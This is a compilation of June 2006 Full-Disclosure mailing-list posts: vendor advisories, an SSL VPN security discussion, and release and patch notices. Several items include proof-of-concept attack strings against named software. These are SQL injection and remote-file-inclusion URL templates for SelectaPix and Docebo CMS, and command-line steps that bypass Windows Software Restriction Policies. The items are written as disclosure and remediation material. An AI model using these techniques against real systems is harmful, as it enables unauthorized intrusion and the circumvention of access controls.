-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The RSBAC team is happy to announce that RSBAC 1.2.7 has just been released for both kernels 2.4.32 and 2.6.16. This is the latest stable version. There is no special upgrade path if you were using 1.2.6 or 1.2.5 Simply compile, install the new admin tools and the new kernel. This is a short release since 1.2.6 that fixes a few remaining issues. Changes since 1.2.6: * Fix rsbac-admin debian Changelog * Fix 2.4 pax flags location * Fix 1.2.6 patches issues (non-RSBAC code) Changes since 1.2.5: * New kthread notification code * rsbac_login behaving now more like pam login * GCC-4 compatibility fixes * Change FF to allow file READ (but not READ_OPEN) even with execute_only * Caches infected scan results on read/open/close instead of rescan * xstats now include GROUP targets * Debian package fixes Patches and prepatched kernels are available at this location: http://rsbac.org/download#current_version1.2.7 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEiUPj80VHuunDdyYRAtugAKCI6j9gbf3gjQFaYcKtwAwI7JgbWwCeKe/G ZHBqv+hPI0OQN/z+y2ESTXo= =Qn1G -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE: Want to test this desktop barrier? (Unauthorized offer) > 0day protection (Bill Stout)
Hi Message: 14 Date: Thu, 8 Jun 2006 18:07:27 -0700 From: "Bill Stout" <[EMAIL PROTECTED]> Subject: RE: [Full-disclosure] Want to test this desktop barrier? (Unauthorized offer) 0day protection It is conceptually different than AV or AS products, which is which is >why I fall back to analogies. Even experienced security folk >automatically categorize something new with existing products, and >presuppose there is nothing new under the sun. My first reaction on reading the article was that finally Windows users can get something that resembles what is built-in to Unix/Linux/MacOSX... the ability to seperate user space from root/administrator/system. Does Winpooch do the same? Regards Chavoux ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: SSL VPNs and security
Very good information, we use F5 firepass products and I could see the same issue inherinet in your statements. The benefits to the business, from a cost perspective, are many, no need for tokens unless you are doing 2-factor auth, which I encourage as it will check your personal PIN against your AD account to ensure you are, who you say you are. Without 2-factor, it's a lost cause. Thoughts? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: AutoMate unacev2.dll Buffer Overflow Vulnerability
== Secunia Research 07/06/2006 - AutoMate unacev2.dll Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * AutoMate version 6.1.0.0 Other versions may also be affected. == 2) Severity Rating: Less Critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in AutoMate, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in UNACEV2.DLL when extracting an ACE archive containing a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when a user extracts a specially crafted ACE archive. The vulnerability is related to: SA16479 Successful exploitation requires that the user is e.g. tricked into scheduling a task to extract a malicious ACE archive. == 4) Solution The vendor reportedly released a fix on 2006-05-29. Do not extract untrusted ACE archives. == 5) Time Table 02/05/2006 - Initial vendor notification. 09/05/2006 - Initial vendor reply. 16/05/2006 - Vendor reminder. 16/05/2006 - Vendor reply. 30/05/2006 - Vendor reminder. 07/06/2006 - Public disclosure. (No reply from vendor) == 6) Credits Discovered by Secunia Research. == 7) References SA16479: http://secunia.com/advisories/16479/ The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2005-2856 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-38/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: SelectaPix Cross-Site Scripting and SQL Injection Vulnerabilities
== Secunia Research 09/06/2006 - SelectaPix Cross-Site Scripting and SQL Injection Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerabilities...4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * SelectaPix 1.31 Prior versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Manipulation of data and cross-site scripting Where: Remote == 3) Vendor's Description of Software SelectaPix is a free (GPL Licence), highly configurable PHP/MySQL image gallery system which can be integrated into your existing site in minutes. The password-protected admin section allows you to upload up to 10 jpeg images in one go, and arrange them into albums and sub-albums. Product link: http://www.outofthetrees.co.uk/selectapix/index.php == 4) Description of Vulnerabilities Secunia Research has discovered some vulnerabilities in SelectaPix, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks. 1) Some input is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Examples: http://[host]/view_album.php?albumID=[code] http://[host]/popup.php?albumID=2&imageID=[code] http://[host]/index.php?albumID=[code] * The "username" and "passwd" parameters passed in "admin/member.php". This can further be exploited to bypass the authentication process and access the administration section. Successful exploitation requires that "magic_quotes_gpc" is disabled (except for the "albumID" parameter). 2) Input passed to the "albumID" parameter in "popup.php" and "view_album.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities have been confirmed in version 1.31. Prior versions may also be affected. == 5) Solution Update to version 1.4. http://www.outofthetrees.co.uk/selectapix/index.php == 6) Time Table 17/05/2006 - Initial vendor notification. 31/05/2006 - Vendor confirms vulnerabilities. 09/06/2006 - Public disclosure. == 7) Credits Discovered by Andreas Sandblad, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-2912 (SQL injection) and CVE-2006-2913 (cross-site scripting) for the vulnerabilities. == 9) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-39/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: SSL VPNs and security
I agree on your point that the technology requires PROPER design. Vendors who miss the basics should lose their right to play the game. On 6/9/06, Michal Zalewski <[EMAIL PROTECTED]> wrote: On Fri, 9 Jun 2006, E Mintz wrote: > How about some real-world, application specific exploits? There's an example of a XSS that can be used to compromise Cisco Web VPN session in the text. > So, please show me an example of an actual compromise and I'll listen. > Otherwise, put up, or shut up! You're not strictly required to listen, you know ;) /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: SSL VPNs and security
How about some real-world, application specific exploits? SSL VPN is hardly a 'novelty' or 'recent' technology. I implemented my first SSL VPN in '99 at a large financial, and it is still in production, and secure So, please show me an example of an actual compromise and I'll listen. Otherwise, put up, or shut up! -Erik On 6/8/06, Michal Zalewski < [EMAIL PROTECTED] > wrote: > "Web VPN" or "SSL VPN" is a term used to denote methods for accessing > company's internal applications with a bare WWW browser, with the use of > browser-based SSO authentication and SSL tunneling. As opposed to IPSec, > no additional software or configuration is required, and hence, corporate > users can use pretty much any computer they can put their hands on. > [ Yes, this is a very bad idea, but often also a perceived business > necessity. To counter the risk, some SSL VPN solutions may perform > client-side security checks with the aid of an applet or control "not > marked as safe". This is, of course, a silly and bypassable design, > and has a side effect of teaching the user to click "yes" on > scripting safety prompts. But I digress... ] > > [ These solutions are sold, among others, by Juniper, Nortel, Nokia, > Cisco. The following observations are based on Cisco Web VPN (and your > mileage with this and other vendors may vary). > > In their most basic operating mode, SSL VPN systems simply act as a HTTPS > authentication and authorization proxy that relies on session cookies, and > a URI-based request rewriting and forwarding engine. Such a configuration > enables the user to access any HTTP or HTTPS based Intranet applications; > web-based clients for some other protocols are also sometimes included. > > [ With the help of various controls and applets again "not marked as > safe", SSL VPNs can also forward local TCP ports through that tunnel, > if unsupported network protocols need to be used. ] > > A good example: let's say there's an user who wishes to access his > corporate Outlook Web Access interface from a remote location. The usual > URL for the intranet service is: > > http://owa/exchange/lcamtuf/inbox > > To access it over the Internet, that fellow needs to navigate to > https://webvpn.foocorp.com/, enter his credentials, collect a session > cookie, and then go to (or be redirected to) something along the lines of: > > https://webvpn.foocorp.com/http/0/owa/exchange/lcamtuf/inbox > > ...which, if the cookie validates, would be translated to the original URL > and allowed to go through, with SSL VPN acting as a proxy. > > Commercial SSL VPNs are a fairly recent technology that has a considerable > appeal to various corporations. Because of its novelty, however, in a > typical setup it may be subject to several serious security flaws, unless > very carefully designed. > > Possibly the most important problem is that web VPNs break the customary > browser security model that relies on domain name separation for the > purpose of restricting access to cookies and other objects. Browsers > generally allow " foo.com" to interact with own cookies or windows, but > prevent the site from accessing resources related to "bar.com". Yet > through SSL VPN, they all may look the same: > >https://webvpn.foocorp.com/http/0/foo.com/serious_work > https://webvpn.foocorp.com/http/0/bar.com/fun_and_games > > Because of this design, all pages displayed through a Web VPN interface > are lumped together. Whenever a page (or just a HTML fragment) that can be > controlled by the attacker is displayed by *any* of the applications > behind Web VPN, Javascript can access: > > - Web VPN session cookie, which can be then passed to the attacker. > This is equivalent to the attacker obtaining access to all protected > systems and compromising Web VPN altogether. The threat could be > mitigated by associating the cookie with client's IP, but such an > approach is not always implemented, and is impractical with AOL and > the likes. > > - Application cookies set by other applications. If passed to the > browser (as some SSL VPNs do), these cookies are separated by the use > of "path" parameter alone, which does not necessarily establish a > browser security domain boundary. This is equivalent to the attacker > obtaining user credentials to these applications. > > Some commonly used corporate applications may indeed serve > attacker-supplied contents, making these attacks virtually inherent to > most SSL VPN deployments: > > - Various web mail systems, such as Outlook Web Access (OWA), > may serve HTML attachments and other documents received from the > Internet without providing an adequate browser warning. Although > this is a security challenge by itself for all web mail interfaces > (where there is a risk of stealing web mail session coookie), > the access to all SSL VPN cookies make the impact far more serious. > > - Tr
[Full-disclosure] Docebo CMS 3.0.3, Remote command execution
- Advisory id: FSA:007 Author:Federico Fazzi Date: 09/06/2006, 6:10 Sinthesis: Docebo CMS 3.0.3, Remote command execution Type: high Product: http://www.docebolms.org/ Patch: unavailable - 1) Description: Error occured in news_class.php, include_once($GLOBALS['where_framework']."/lib/lib.listview.php"); include_once($GLOBALS['where_framework']."/lib/lib.treedb.php"); include_once($GLOBALS['where_framework']."/lib/lib.treeview.php"); Error occured in content_class.php, include_once($GLOBALS['where_framework']."/lib/lib.listview.php"); include_once($GLOBALS['where_framework']."/lib/lib.treedb.php"); include_once($GLOBALS['where_framework']."/lib/lib.treeview.php"); Error occured in util.media.php, include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php"); The users can include a remote file because the $GLOBALS['where_framework'], $GLOBALS['where_cms'] isn't sanitized 2) Proof of concept: http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url] http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url] http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url] 3) Solution: include file where are declare $GLOBALS[*] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows Software Restriction Policy Protection Bypass
Dear bugtraq@securityfocus.com,
It was reported anonymously with request to post to lists.
Windows Software Restriction Policy Protection Bypass
Author: Anonymous
Class: Restrictions bypass
Vector: Local
Vendor: Microsoft
Sofware: Windows XP SP2, Windows Server 2003 SP1
Risk level: Low
Remark:
I don't know, what is it - bug or feature, but I can't find any
documentation on this issue.
Description:
Software Restriction Policies restrictions doesn't apply if user logon
via secondary logon service (Run As).
Test:
Create new SRP policy (in Local or Domain Level GPO, for User or for
Computer). Change security levels to Disallowed. Update policy and logon
as restricted user. Copy notepad to the desktop. Try to launch notepad
from desktop (will fail). Right click on notepad, choose run as, select
"Following users", and type current user name and password. You'll see
launched notepad. CLI version (runas.exe) provides similar results.
Remark.
Why ACLs are not workaround?
If user has ability to write (create files) in any folder (for example -
profile, temporary internet
files, whatever) he (or she of cause) becomes the owner of created files. And
even we revoke NTFS
execute permission on any writable folder, user can change permissions on
files, because he (or she of
cause) is creator/owner for said file.
Example (user 'test' is not an administrator):
cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE
BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
WINXP01\test:F
BUILTIN\Users:R
C:\noexec>notepad.exe
Access denided.
C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F
C:\noexec>notepad.exe
Workaround:
Disable Secondary Logon service:
sc stop seclogon
sc config seclogon start= disabled
Timeline:
05.06 - Vulnerability discovered
08.06.06 - Vendor notification
09.06.06 - Vendor response
"Software Restriction Policy and Group Policy are not meant to be
complete security features...For full security, we recommend using ACLs
to protect the appropriate resources in your environment..."
09.06.06 - Public disclosure
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-288-2] PostgreSQL server/client vulnerabilities
=== Ubuntu Security Notice USN-288-2 June 09, 2006 postgresql-8.1 vulnerabilities CVE-2006-2313, CVE-2006-2314 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libpq-dev 8.1.4-0ubuntu1 libpq4 8.1.4-0ubuntu1 postgresql-8.1 8.1.4-0ubuntu1 postgresql-client-8.1 8.1.4-0ubuntu1 postgresql-contrib-8.1 8.1.4-0ubuntu1 After a standard system upgrade you need to restart all services that use PostgreSQL to effect the necessary changes. If you can afford it, rebooting the computer is the easiest way of ensuring that all running services use the updated client library. Details follow: USN-288-1 fixed two vulnerabilities in Ubuntu 5.04 and Ubuntu 5.10. This update fixes the same vulnerabilities for Ubuntu 6.06 LTS. For reference, these are the details of the original USN: CVE-2006-2313: Akio Ishida and Yasuo Ohgaki discovered a weakness in the handling of invalidly-encoded multibyte text data. If a client application processed untrusted input without respecting its encoding and applied standard string escaping techniques (such as replacing a single quote >>'<< with >>\'<< or >>''<<), the PostgreSQL server could interpret the resulting string in a way that allowed an attacker to inject arbitrary SQL commands into the resulting SQL query. The PostgreSQL server has been modified to reject such invalidly encoded strings now, which completely fixes the problem for some 'safe' multibyte encodings like UTF-8. CVE-2006-2314: However, there are some less popular and client-only multibyte encodings (such as SJIS, BIG5, GBK, GB18030, and UHC) which contain valid multibyte characters that end with the byte 0x5c, which is the representation of the backslash character >>\<< in ASCII. Many client libraries and applications use the non-standard, but popular way of escaping the >>'<< character by replacing all occurences of it with >>\'<<. If a client application uses one of the affected encodings and does not interpret multibyte characters, and an attacker supplies a specially crafted byte sequence as an input string parameter, this escaping method would then produce a validly-encoded character and an excess >>'<< character which would end the string. All subsequent characters would then be interpreted as SQL code, so the attacker could execute arbitrary SQL commands. To fix this vulnerability end-to-end, client-side applications must be fixed to properly interpret multibyte encodings and use >>''<< instead of >>\'<<. However, as a precautionary measure, the sequence >>\'<< is now regarded as invalid when one of the affected client encodings is in use. If you depend on the previous behaviour, you can restore it by setting 'backslash_quote = on' in postgresql.conf. However, please be aware that this could render you vulnerable again. This issue does not affect you if you only use single-byte (like SQL_ASCII or the ISO-8859-X family) or unaffected multibyte (like UTF-8) encodings. Please see http://www.postgresql.org/docs/techdocs.50 for further details. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.4-0ubuntu1.diff.gz Size/MD5:23774 50475bf9e83adaa54956b32fbeedbdca http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.4-0ubuntu1.dsc Size/MD5: e1b77d64f44d3293f650b126ff624565 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.4.orig.tar.gz Size/MD5: 11312643 c6554a0ef948ab2b18b617954e1788fe Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.4-0ubuntu1_all.deb Size/MD5: 1440630 81de1288298a0b1540b995db84d639db amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.4-0ubuntu1_amd64.deb Size/MD5: 151534 1a2d7dbbb8be5b9c8a5839a9602ca654 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.4-0ubuntu1_amd64.deb Size/MD5: 343524 06e9895e5575d0abdc2d90c504d0f60c http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.4-0ubuntu1_amd64.deb Size/MD5: 172050 6d8c0db031695b43daedf1ba0ccf1db4 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.4-0ubuntu1_amd64.deb Size/MD5: 173882 4df3a6
